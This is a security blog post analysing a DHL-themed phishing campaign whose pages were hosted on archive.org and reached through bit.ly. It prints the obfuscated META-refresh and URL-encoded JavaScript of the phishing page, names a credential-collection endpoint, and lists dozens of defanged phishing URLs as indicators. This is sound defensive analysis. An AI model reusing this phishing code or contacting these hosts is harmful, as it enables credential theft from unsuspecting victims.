The Internet Archive is a well-known website and more precisely for its “WaybackMachine” service. It allows you to search for and display old versions of websites. The current Alexa ranking is 262 which makes it a “popular and trusted” website. Indeed, like I explained in a recent SANS ISC diary, whitelists of websites are very important for attackers! The phishing attempt that I detected was also using the URL shortener bit.ly (Position 9380 in the Alexa list).
The phishing is based on a DHL notification email. The mail has a PDF attached to it:
This PDF has no malicious content and is therefore not blocked by antispam/antivirus. The link “Click here” points to a bit.ly short URL:
hxxps://bitly.com/2jXl8GJ
Note that HTTPS is used which already make the traffic non-inspected by many security solutions.
Tip: If you append a “+” at the end of the URL, bit.ly will not directly redirect you to the hidden URL but will display you an information page where you can read this URL!
The URL behind the short URL is:
hxxps://archive.org/download/gxzdhsh/gxzdhsh.html
Bit.ly also maintains statistics about the visitors:
It’s impressive to see how many people visited the malicious link. The phishing campaign was also active since the end of March. Thank you bit.ly for this useful information!
This URL returns the following HTML code:
<html> <head> <title></title> <META http-equiv="refresh" content="0;URL=data:text/html;base64, ... (base64 data) ... " </head> <body bgcolor="#fffff"> <center> </center> </body> </html>
The refresh META tag displays the decoded HTML code:
<script language="Javascript">
document.write(unescape('%0A%3C%68%74%6D%6C%20%68%6F%6C%61%5F%65%78%74%5F%69%6E%6A%65%63
%74%3D%22%69%6E%69%74%65%64%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D
%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D
%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31
%32%35%32%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F
%6E%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%68%6C%2E%63%6F%6D%2F%69
%6D%67%2F%66%61%76%69%63%6F%6E%2E%67%69%6
...
%3E%0A%09%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%65%64%61%67
%72%6F%6C%74%64%2E%63%6F%6D%2F%6D%6F%62%2F%44%48%4C%5F%66%69%6C%65%73%2F%61%6C%69%62%61
%62%61%2E%70%6E%67%22%20%68%65%69%67%68%74%3D%22%32%37%22%20%0A%0A%77%69%64%74%68%3D%22
%31%33%30%22%3E%0A%09%3C%2F%74%64%3E%0A%0A%09%3C%2F%74%72%3E%3C%2F%74%62%6F%64%79%3E%3C
%2F%74%61%62%6C%65%3E%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%0A%0A%0A%3C%74%72%3E%3C%74%64
%20%68%65%69%67%68%74%3D%22%35%25%22%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30
%22%3E%0A%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C
%65%3E%0A%0A%0A%0A%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
</Script>
The deobfuscated script displays the following page:
The pictures are stored on a remote website but it has already been cleaned:
hxxp://www.fedagroltd.com/mob/DHL_files/
Stolen data are sent to another website: (This one is still alive)
hxxp://www.magnacartapeace.org.ng/wp/stevedhl/kenbeet.php
The question is: how this phishing page was stored on archive.org? If you visit the upper level on the malicious URL (https://archive.org/download/gxzdhsh/), you find this:
Go again to the upper directory (‘../’) and you will find the owner of this page: alextray. This guy has many phishing pages available:
Indeed, the Internet Archives website allows registered users to upload content as stated in the FAQ. If you search for ‘archive.org/download’ on Google, you will find a lot of references to multiple contents (most of them are harmless) but on VT, there are references to malicious content hosted on archive.org.
Here is the list of phishing sites hosted by “alextray”. You can use them as IOC’s:
hxxps://archive.org/download/gjvkrduef/gjvkrduef.html hxxps://archive.org/download/Jfojasfkjafkj/jfojas;fkj;afkj;.html hxxps://archive.org/download/ygluiigii/ygluiigii.html (Yahoo!) hxxps://archive.org/download/ugjufhugyj/ugjufhugyj.html (Microsoft) hxxps://archive.org/download/khgjfhfdh/khgjfhfdh.html (DHL) hxxps://archive.org/download/iojopkok/iojopkok.html (Adobe) hxxps://archive.org/download/Lkmpk/lkm[pk[.html (Microsoft) hxxps://archive.org/download/vhjjjkgkgk/vhjjjkgkgk.html (TNT) hxxps://archive.org/download/ukryjfdjhy/ukryjfdjhy.html (TNT) hxxps://archive.org/download/ojodvs/ojodvs.html (Adobe) hxxps://archive.org/download/sfsgwg/sfsgwg.html (DHL) hxxps://archive.org/download/ngmdlxzf/ngmdlxzf.html (Microsoft) hxxps://archive.org/download/zvcmxlvm/zvcmxlvm.html (Microsoft) hxxps://archive.org/download/ugiutiyiio/ugiutiyiio.html (Yahoo!) hxxps://archive.org/download/ufytuyu/ufytuyu.html (Microsoft Excel) hxxps://archive.org/download/xgfdhfdh/xgfdhfdh.html (Adobe) hxxps://archive.org/download/itiiyiyo/itiiyiyo.html (DHL) hxxps://archive.org/download/hgvhghg/hgvhghg.html (Google Drive) hxxps://archive.org/download/sagsdg_201701/sagsdg.html (Microsoft) hxxps://archive.org/download/bljlol/bljlol.html (Microsoft) hxxps://archive.org/download/gxzdhsh/gxzdhsh.html (DHL) hxxps://archive.org/download/bygih_201701/bygih.html (DHL) hxxps://archive.org/download/bygih/bygih.html (DHL) hxxps://archive.org/download/ygi9j9u9/ygi9j9u9.html (Yahoo!) hxxps://archive.org/download/78yt88/78yt88.html (Microsoft) hxxps://archive.org/download/vfhyfu/vfhyfu.html (Yahoo!) hxxps://archive.org/download/yfuyj/yfuyj.html (DHL) hxxps://archive.org/download/afegwe/afegwe.html (Microsoft) hxxps://archive.org/download/nalxJL/nalxJL.html (DHL) hxxps://archive.org/download/jfleg/jfleg.html (DHL) hxxps://archive.org/download/yfigio/yfigio.html (Microsoft) hxxps://archive.org/download/gjbyk/gjbyk.html (Microsoft) hxxps://archive.org/download/nfdnkh/nfdnkh.html (Yahoo!) hxxps://archive.org/download/GfhdtYry/gfhdt%20yry.html (Microsoft) hxxps://archive.org/download/fhdfxhdh/fhdfxhdh.html (Microsoft) hxxps://archive.org/download/iohbo6vu5/iohbo6vu5.html (DHL) hxxps://archive.org/download/sgsdgh/sgsdgh.html (Adobe) hxxps://archive.org/download/mailiantrewl/mailiantrewl.html (Google) hxxps://archive.org/download/ihiyi/ihiyi.html (Microsoft) hxxps://archive.org/download/glkgjhtrku/glkgjhtrku.html (Microsoft) hxxps://archive.org/download/pn8n8t7r/pn8n8t7r.html (Microsoft) hxxps://archive.org/download/aEQWGG/aEQWGG.html (Yahoo!) hxxps://archive.org/download/isajcow/isajcow.html (Yahoo!) hxxps://archive.org/download/pontiffdata_yahoo_Kfdk/;kfd;k.html (Yahoo!) hxxps://archive.org/download/vuivi/vuivi.html (TNT) hxxps://archive.org/download/lmmkn/lmmkn.html (Microsoft) hxxps://archive.org/download/ksafaF/ksafaF.html (Google) hxxps://archive.org/download/fsdgs/fsdgs.html (Microsoft) hxxps://archive.org/download/joomlm/joomlm.html (Microsoft) hxxps://archive.org/download/rdgdh/rdgdh.html (Adobe) hxxps://archive.org/download/pontiffdata_yahoo_Bsga/bsga.html (Microsoft) hxxps://archive.org/download/ihgoiybot/ihgoiybot.html (Microsoft) hxxps://archive.org/download/dfhrf/dfhrf.html (Microsoft) hxxps://archive.org/download/pontiffdata_yahoo_Kgfk_201701/kgfk.html (Microsoft) hxxps://archive.org/download/jhlhj/jhlhj.html (Yahoo!) hxxps://archive.org/download/pontiffdata_yahoo_Kgfk/kgfk.html (Microsoft) hxxps://archive.org/download/pontiffdata_yahoo_Gege/gege.html (Microsoft) hxxps://archive.org/download/him8ouh/him8ouh.html (DHL) hxxps://archive.org/download/maiikillll/maiikillll.html (Google) hxxps://archive.org/download/pontiffdata_yahoo_Mlv/mlv;.html (Microsoft) hxxps://archive.org/download/oiopo_201701/oiopo.html (Microsoft) hxxps://archive.org/download/ircyily/ircyily.html (Microsoft) hxxps://archive.org/download/vuyvii/vuyvii.html (DHL) hxxps://archive.org/download/fcvbt_201612/fcvbt.html (Microsoft) hxxps://archive.org/download/poksfcps/poksfcps.html (Yahoo!) hxxps://archive.org/download/tretr_201612/tretr.html hxxps://archive.org/download/eldotrivoloto_201612/eldotrivoloto.html (Microsoft) hxxps://archive.org/download/babalito_201612/babalito.html (Microsoft) hxxps://archive.org/download/katolito_201612/katolito.html (Microsoft) hxxps://archive.org/download/kingshotties_201612/kingshotties.html (Microsoft) hxxps://archive.org/download/fcvbt/fcvbt.html (Microsoft) hxxps://archive.org/download/vkvkk/vkvkk.html (DHL) hxxps://archive.org/download/pontiffdata_yahoo_Vkm/vkm;.html (Microsoft) hxxps://archive.org/download/hiluoogi/hiluoogi.html (Microsoft) hxxps://archive.org/download/ipiojlj/ipiojlj.html (Microsoft)
[The post Archive.org Abused to Deliver Phishing Pages has been first published on /dev/random]
from Xavier
No comments:
Post a Comment